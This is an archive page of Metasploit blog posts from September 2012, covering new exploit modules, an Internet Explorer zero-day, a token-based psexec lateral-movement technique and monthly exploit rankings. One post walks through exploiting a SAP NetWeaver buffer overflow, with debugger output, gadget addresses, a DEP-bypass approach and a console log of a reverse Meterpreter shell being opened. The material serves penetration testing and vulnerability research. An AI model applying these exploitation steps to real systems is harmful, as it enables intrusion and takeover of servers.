Skip navigation
All Places > Metasploit > Blog > 2012 > September
2012

In addition to the frankly killer 0-day in RateMyPet, we have a couple other things going on in Metasploit land.

 

Mac OSX 64-Bit Payloads

 

Probably the most significant add this week is Metasploit community contributor Nemo's two new 64-bit payloads for Mac OSX targets. While OSX isn't the most popular target on the block, we do have a steadily growing collection of exploits targeting Apple platforms, so bringing 64-Bit platforms into the fold of assessable targets is kind of a big deal. Thanks Nemo!

 

Fixing MSFUpdate After an Outage

 

DerbyCon is afoot, so naturally (let's say) it's time to update a pile of Metasploit's Ruby gem dependencies. Ruby gems include things like ActiveRecord that allows Framework to talk to the database backend, and Railties, which is an extension to Rails and handles parts of the Metasploit Community and Metasploit Pro interfaces. All told, this update has about 400,000 lines of source code change from last update. About that...

 

Late last week, this gem update ended up causing some problems for users who a) track our development very closely while b) on slower links or c) overseas who d) use svn or msfupdate specifically to get their daily (or hourly) fix of Metasploit updates. This doesn't describe the typical Metasploit Community or Metasploit Pro users, who get updates on a weekly basis. This would have affected only the people who fit this particular profile.

 

It's not the total size difference that caused problems, mind you. This week's update is slightly smaller than last week's, due to these changes, as it turns out. The problem is the way SVN tracks the changes that can cause msfupdate to bail out before it completes. This tracking is fine and normal for a source control system, but it's not all that great for a (relatively) simple software update system.

 

While Metasploit Pro users wouldn't have noticed anything wrong, the some of our open source Framework folks would have noticed the problems starting late last week. If you have been msfupdating lately, and not noticed anything, you're out of the woods.

 

I'm sorry about that. I'm so sorry, in fact, that I'm revisiting how msfupdate does its update thing. We'll be looking at better ways to pick up changes from the master branch in a reasonably quick way that doesn't drag along the entire history of Metasploit development with it, which was the crux of the problem.

 

Moral of the story is, we're treating this episode like a service outage. This week's update will get everyone past the 400KLOC change hump (updates like this effectively advance the pointer for you), and we'll test our new updating process on slow links so as not run into this kind of problem again.

 

So, happy DerbyCon everyone, bring home some 0-day, and we'll be all set for next week.

 

New Modules

 

It's not all gem updates, of course. We have a smattering of new modules for you, too. For details and usage on these, just follow the links to our Exploit Database.

 

Exploit modules


 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

Yo Dawg, I Heard You Like 0-Day

 

As you may have heard, on Monday we rolled out a special update to Metasploit to include the new Internet Explorer use-after-free exploit, aka, CVE-2012-4969. Last night, while scrolling through my RSS feed for security news, I saw this NetworkWorld story about how someone is using this vulnerability to install Poison Ivy, a RAT / backdoor. Of course, astute readers of this blog will know that Poison Ivy itself is vulnerable to a stack buffer overflow condition.

 

Let's think about this for a second. Internet criminals are using an unpatched IE vulnerability to deliver software which is controlled by software that also has an unpatched vulnerability.

 

So, if you happen across a vulnerable client during a penetration test, it would behoove you to check to see if anyone is connected to Poison Ivy's listening socket, TCP/3460. From there, you should be able to discover if any /other/ assets that are in scope for your test are already controlled. Exact details of how to accomplish that are left as an exercise for the reader. (:

 

By the way, if you haven't yet had a chance to test the Metasploit module for the Internet Explorer vulnerability, here's a video of Eric Romang taking it for a spin. Huge thanks again to Eric and @binjo for throwing in on all this. Getting the word out on these high-value bugs really does kill their usability for the bad guys.

 

New Modules

 

Of course, there's more in this update than just a refresh of the MSIE exploit. Egypt has a nice new local exploit for Linux's udev, discovered by kcope, which is pretty nifty. So, here's the list -- for details and usage, follow the links to our Exploit Database.

 

Exploit modules


 

Auxiliary modules

 

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

webcast-metasploit-security-programs.jpgThanks for the many CISOs and security engineers who attended our recent webcast, in which I presented some practical advice on how to leverage Metasploit to conduct regular security reviews that address current attack vectors. While Metasploit is often used for penetration testing projects, this presentation focuses on leveraging Metasploit for ongoing security assessments that can be achieved with a small security team to reduce the risk of a data breach.

 

This webcast is now available for on-demand viewing

 

What you'll learn in this webcast:

 

  • Recent attack trends and how they matter to your business
  • Automating penetration tests to prevent untargeted, automated attacks
  • Quick & easy ways to verify vulnerabilities reported by your vulnerability assessment program so you can focus your limited resources where they have the most impact
  • Conducting regular password audits that require minimal effort to set up and maintain
  • Running social engineering campaigns to measure security awareness in an enterprise

 

Audience questions answered in this webcast

 

 

View the Security Programs with Metasploit Webcast Now

We have some Metasploit freshness for you today: A new zero-day exploit for Internet Explorer 7, 8, and 9 on Windows XP, Vista and 7. Computers can get compromised simply by visiting a malicious website, which gives the attacker the same privileges as the current user. Since Microsoft has not released a patch for this vulnerability yet, Internet users are strongly advised to switch to other browsers, such as Chrome or Firefox, until a security update becomes available. The exploit had already been used by malicious attackers in the wild before it was published in Metasploit. The associated vulnerability puts about 41% of Internet users in North America and 32% world-wide at risk (source: StatCounter). We have added the zero-day exploit module to Metasploit to give the security community a way to test if their systems are vulnerable and to develop counter-measures.

 

Here's the back story: Some of you may remember that a couple of weeks ago, the Metasploit exploit team released a blog regarding a new Java exploit (CVE-2012-4681), with a blog entry titled "Let's Start the Week with a New Java 0day in Metasploit". You'd think the 0-day attack from the same malicious group might cool down a little after that incident... well, you'd be wrong. Because last weekend, our fellow researcher and Metasploit contributor Eric Romang just spotted another 0-day, possibly from the same group, exploiting a Microsoft Internet Explorer use-after-free vulnerability.

 

The Metasploit team has had the pleasure to work with Mr. Romang and @binjo together, and pretty soon we had a working exploit. You may download Metasploit here, and apply the latest update to pick up the exploit.

 

The following screenshot demonstrates a successful attack against a Windows 7 machine with Internet Explorer 9 installed:

 

Screen shot 2012-09-17 at 7.59.19 AM.png

 

This one is against Internet Explorer 8 installed:

 

Screen shot 2012-09-16 at 5.32.08 PM.png

 

Here's another example exploiting a fully-patched Windows XP SP3 box:

 

screenshot.png

 

The exploit also works against Windows Vista, but I think you guys get the point now.

 

To try out this module, get your free Metasploit download now, or update your existing installation. In the meantime, we will keep this blog updated when more progress has been made.

 

==========

UPDATE:

Stupid PHP Tricks

 

This week's Metasloit update is a cautionary tale about running unaudited PHP applications as part of your infrastructure. Metasploit community contributor Brendan Coles has discovered and written Metasploit modules for two similar root-level vulnerabilities one for OpenFiler and one for WAN Emulator (aka "WANem").

 

To be honest, I don't have anything personal against PHP. Some of my best friends are PHP guys. That said, these modules exploit some pretty serious flaws, and stuff like this crops up alarmingly often in PHP apps due the forty zillion ways PHP allows the developer to expose command injection vulnerabilities. Taking this as a given for the language, running a binary as setuid root (as WANem does) or having your service account be in the wheel group (as OpenFiler does), is asking for trouble.

 

Part of the security agreement we have with open source software is a notion of basic auditability. Ostensibly, it's not just possible, but likely, that security bugs like these won't live long in open source software, due to the fact that the code is directly auditable. Now, I don't know how long these bugs actually lived out in the wild, but thanks to Brendan for fulfilling his end of this social contract. The take-away here is, if you are considering running open source software in your environment, I hope you take advantage of the openness and perform a cursory audit for red flag warning sings like these.

 

Keeping Targets Fresh

 

In addition to the new modules this week, we've also validated some new targets for the HP SiteScope getSiteScopeConfiguration and HP SiteScope loadFileContent ZDI exploits. When research time permits, we like to loop back over recent disclosures like these to see if we can't validate more targets than the original exploit covered, so this kind of updating is pretty common. However, we don't have infinite time and bandwidth, so if you happen to notice that one of Metasploit's shipping modules works against a target that wasn't mentioned in the description, let us know! A GitHub pull request with a description update and some kind of validation like a screen capture or pcap dump is an ideal method to alert us to more targets, but e-mail, IRC, bug reports, or SecurityStreet posts will get our attention, too.

 

New Modules

 

Here are the new modules -- for details and usage, follow the links to our Exploit Database.

 

Exploit modules

 

 

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

egypt

Current User psexec

Posted by egypt Employee Sep 12, 2012

At DEF CON this year I talked about some of the post exploitation capabilities within Metasploit and demo'd a cool technique I developed with Jabra on a pentest a year or so ago (I later found out that Mubix had come up with basically the same idea - great minds think alike). It is essentially this: use a session's current token to create a remote service on a victim machine.

 

It takes advantage of a feature in Windows that most people take completely for granted. Given that you are already logged in to your desktop machine, you can browse around on shares as yourself transparently due to Windows' security token mechanism. This extends to more than just file shares, and to more than just console logins. If your user has Local Administrator access on the target machine, you can also fiddle with the registry and start/stop services, all without knowing a password or hash. Anyone familiar with how psexec works will notice the awesomesauce here.

 

When doing a normal psexec, metasploit uploads an exe to the remote system and uses that as the service executable. It turns out the Windows API allows UNC paths for service executables, and since we have control of a system already on the network, we can reduce the forensics footprint on the network overall by just upload it to the compromised machine. Then we start up a file share, and set all the victims to use a UNC path to that share, resulting in only one filesystem containing the actual executable file, and only for as long as you're running the module. Here's the module in action:

 

I'll be talking about more of the local exploitation capabilities in Metasploit at Derbycon, I hope to see you there.

Zone Transfers for All

 

This week, Metasploit community contributor bonsaiviking fixed up the DNS library that Metasploit uses so we won't choke on some types of zone transfer responses. Turns out, this is a two-year old bug, but DNS servers that actually offer zone transfers are so rare any more that this this bug didn't manifest enough to get squashed.

 

This brings me to a larger point -- with older vulnerabilities like these, sometimes the hardest part for us is reproducing the bug in the first place. With old software, for example, it's sometimes really hard to get a hold of the vulnerable version. With this module, the problem is that it's a pain to go and configure DNS in a vulnerable way.

 

In this case, though, we were able to test using Robin Wood's most useful ZoneTransfer.me service, which is exactly what you think it might be. It's a live DNS server, out on the Internet, with zone transfers enabled. This allows researchers, trainers, and vulnerability archeologists to become familiar with an antique vulnerability that they may still run into in the real world from time to time. This kind of intentionally vulnerable offering is invaluable, so thanks not only to bonsaiviking for finally nailing down this fix, but also to Robin for making the fix easy to test.

 

For all the gritty details, see Pull Request #698 on Metasploit's GitHub site.

 

Exploiting SAP NetWeaver

 

Also in this week's update are two new SAP NetWeaver exploits, both implemented by our own Juan Vazquez, based on the research work from Michael Jordan and Martin Gallo. Juan has another blog post up that dives into the details on how he exploits CVE-2012-2611, complete with screenshots and insightful commentary on the squirelly nature of Unicode detection. If you're a fan of Juan's step-by-step war stories of exploit development, you will definitely want to check the module and blog post.

 

Microsoft SQL Server Tricks

 

So you've gained control of a Microsoft SQL Server database -- now what? Community contributor Scott "nullbind" Sutherland has two new MSSQL modules in this week's update. The first is the exceedingly handy Find and Sample Data module, which can quickly paw through a database for named keywords -- things like "CC#" or "ccval" or "password," or other likely places to find sensitive data that PCI auditors love to get a hold of. The second is a local authentication bypass, which makes it easy and fun to use an existing Meterpreter session to add an sa-level account to the target database.

 

Database hacking holds a special place in my heart, so I love to see these kinds of auxiliary and post modules come in from the community. Thanks for those!

 

New Modules

 

Here are the new modules -- for details and usage, follow the links to our Exploit Database.

 

Exploit modules

 

Auxiliary modules

 

Post modules

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

In this blog post we would like to share some details about the SAP NetWeaver exploit for CVE-2012-2611, which we've recently added to  Metasploit. This module exploits an unauthenticated buffer overflow, discovered by Martin Gallo, in the DiagTraceR3Info() function where tracing is enabled on SAP NetWeaver. It captured our attention due to the well documented technical details, and tools publicly available in order to trigger the vulnerability.

 

First of all, in order to understand the exploitation of this DiagTraceR3Info buffer overflow, the important points about the vulnerable function are explained below:

 

(1) The vulnerable function is protected by stack cookies:

 

TraceInfo_1.png

 

(2) The overflow is caused by a copy-loop, with user controlled data to a static size variable on the stack. Understand this loop is important for exploitation, especially:

  • Before starting the loop, the first word (2 bytes) of data is used to identify if it must be converted to Unicode while copying. If the first word is detected as Unicode, the data will be just copied, without conversion, word by word. It's quite interesting, because this allows us to overflow the stack with our own controlled data!
  • A pointer to the user controlled data (message data) is stored in EBX and the reference is available after the copy loop.
  • To full understand the copying routine, I leave you the following reversing notes:

 

TraceInfo_2.png

 

(3) After the overflowing loop, the function tries to recover a reference to the GetBytesPerChar() from an object stored in the stack. Since the data in the stack has been overwritten, it allows to take control of EIP before the stackcookies check:

 

TraceInfo_3.png

 

(4) When the code tries to call the GetBytesPerChar()  function, EBX is still pointing to the start of the message data (user-controlled):

 

0:000> db ebx
099a0056  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0066  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0076  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0086  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0096  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a00a6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a00b6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a00c6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

 

With this in mind, on a Windows XP SP3, with DEP OptIn, reliable code execution can be achieved just by using a "call ebx". Fortunately UNICODE pointers to "call ebx" exist on the "disp+work.exe" image (it's the SAP dispatcher executable) and the conversion to Unicode along the copy loop is of no concern to us:

 

0:000> u 0x005f007a L1
disp_work!ThVBReadStat+0x23fa [d:\depot\bas\720_rel\src\optu\ntintel\krn\thrun\thxxvb.c @ 11371]:
005f007a ffd3            call    ebx

 

On Windows 2003 SP2, with DEP OptOut, DEP will be enabled for the Dispatcher service and the solution is not so easy. In the message data is converted to Unicode while the copy loop, some options to achieve execution could be:

 

  • Stackpivot to the contents pointed by EBX, or find a way to do a "mov esp, ebx" with unicode pointers.
  • In the stack, a reference to the user controlled data message (without conversion awright) can be found at ESP+20:

 

0:000> dd esp + 20 L1
063e9d9c  099a0056
0:000> db poi(esp+20)
099a0056  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0066  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0076  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0086  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a0096  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a00a6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a00b6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
099a00c6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

 

So stackpivot to the contents pointed by [ESP+20], or find a way to do a "mov esp, [esp+0x20]" with unicode pointers would be another solution.

  • Have a Unicode compliant ROP chain.

 

Unfortunately, after some tries, we weren't able to achieve DEP bypass with neither of the above options. Because of this, it's important to avoid unicode conversion while the copy loop to achieve DEP bypass. With the loop analysis presented before in mind, injecting a null byte in the first word of the TraceInfo message, allows to overflow avoiding Unicode conversion, using full user-controlled data, overwrite the GetBytesPerChar() function pointer stored in the stack, and use the well known ROP chain from msvcrt.dll to achieve DEP bypass on Windows 2003 SP2. And here is the final result:

 

  
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 948 exploits - 503 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops


msf  exploit(sap_netweaver_dispatcher) > use exploit/windows/misc/sap_netweaver_dispatcher 
msf  exploit(sap_netweaver_dispatcher) > set RHOST 192.168.1.149
RHOST => 192.168.1.149
msf  exploit(sap_netweaver_dispatcher) > exploit

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.149:3200 - Sending initialize packet to the SAP Dispatcher
[*] 192.168.1.149:3200 - Sending crafted message
[*] Sending stage (764928 bytes) to 192.168.1.149
[*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.149:1201) at 2012-09-03 00:10:20 +0200

meterpreter > 
[*] Session ID 3 (192.168.1.128:4444 -> 192.168.1.149:1201) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: disp+work.EXE (2732)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2012
[+] Successfully migrated to process 

meterpreter > sysinfo
Computer        : MSFSAP2003
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: MSFSAP2003\SAPServiceNSP
meterpreter > 

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions.

Exploit Database (DB)

Coming from August's Java 0-day release, there are three new Java exploits among the top 10 most searched Metasploit exploits and auxiliary modules in this month's trend list. The monthly statistics are drawn from our exploit database by analyzing webserver logs of searches on metasploit.com, not through Metasploit usage which is not tracked for privacy.

 

Check out the top searched exploits and modules below, annotated with Tod Beardley's excellent comments:

 

  1. Java 7 Applet Remote Code Execution: Of course, this is the reason why all the other Java modules leapt up in the rankings. In case you've been on safari for the last several weeks and haven't heard the story yet. Over a fateful weekend in August, Metasploit exploit devs Wei "sinn3r" Chen, Juan Vazquez, and contributor Josh "jduck" Drake got together on IRC and put together a Metasploit module to take advantage of the vulnerability reported privately to Oracle by Adam Gowdiak and James Forshow. Here's the twist: Nobody at the time knew about Adam's or James's private disclosure to Oracle -- this bug was instead spotted in the wild way before Oracle was planning to release their fix. So, we started the week with a new Java 0-day, and by the end of the week, after much speculation, Oracle did the right thing and accelerated their patch schedule. Interesting times, to say the least. New entry this month.

  2. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It’s also got a great pile of language pack targets. All of Metasploit’s exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you’ve ever heard of. This exploit is also not ancient, so it’s reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft’s Security TechCenter. Down one place from #1 last month.

  3. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody’s gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Down one place from #2 last month.

  4. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de-facto standard exploit for Windows machines - this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It’s now pretty much a case study in stack buffer overflows in Windows, so it’s got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Same position as last month.

  5. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that’s notable in that there’s no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic in at Microsoft’s Security TechCenter. Down 2 places from #3 last month.

  6. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It’s not sexy, but it’s super handy for testing payloads and setup. Even though it’s a lowly #10, I’d bet it’s the most-used module in classroom and test environments. More on this topic in the National Vulnerability Database. Up two places from #7 since last month.

  7. Java Signed Applet Social Engineering Code Execution: Like the Adobe PDF Embedded EXE Social Engineering module, this is a really solid go-to module for social engineering payloads. A simple Google search turns up dozens of demonstration videos from all around the world on how to use this module. Up one place from #8 since last month.

  8. PHP CGI Argument Injection: This exploits CVE-2012-1823, a vulnerability in the way PHP-CGI handles parameters passed on GET requests. The vulnerability was discovered during a capture-the-flag exercise at NullCon in January 2012, and the bug's life cycle is pretty thoroughly documented over at De Eindbazen. Here's the short story: this bug, which allows for command execution via GET requests to PHP-CGI installtions, has been knocking around PHP installations since 2004. It was first reported to PHP in January of 2012 (yes, eight years after it was introduced), subsequently leaked accidentally in May of 2012, and actively exploited shortly thereafter. More info on this on a blog at Serge Security. Up one place from #9 since last month.

  9. Java Applet Rhino Script Engine Remote Code Execution: This module from late November of 2011 used to be the go-to Java exploit for browser targets - of course, that all changed with the new Java 0-day we released this month. This module most likely jumped up the rankings as everyone and their brother pawed through the Metasploit Exploit DB for all things Java. We got a ton of coverage on the Java 0-day event, so that aura certainly skewed the numbers for this module, even when it was already pretty popular. New entry since last month.

  10. Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240): This module exploits CVE-2010-1240 in Adobe Reader. The idea is that you can embed and execute a Meterpreter PE Executable in a PDF, and when the user opens the PDF, surprise shells! Since it’s on this list, it’s probably the most popular social engineering-style module. More on this topic in at the National Vulnerability Database.  Same position as last month.

 

If you want to use any of these exploits right now, you can download Metasploit for free!

Filter Blog

By date: By tag: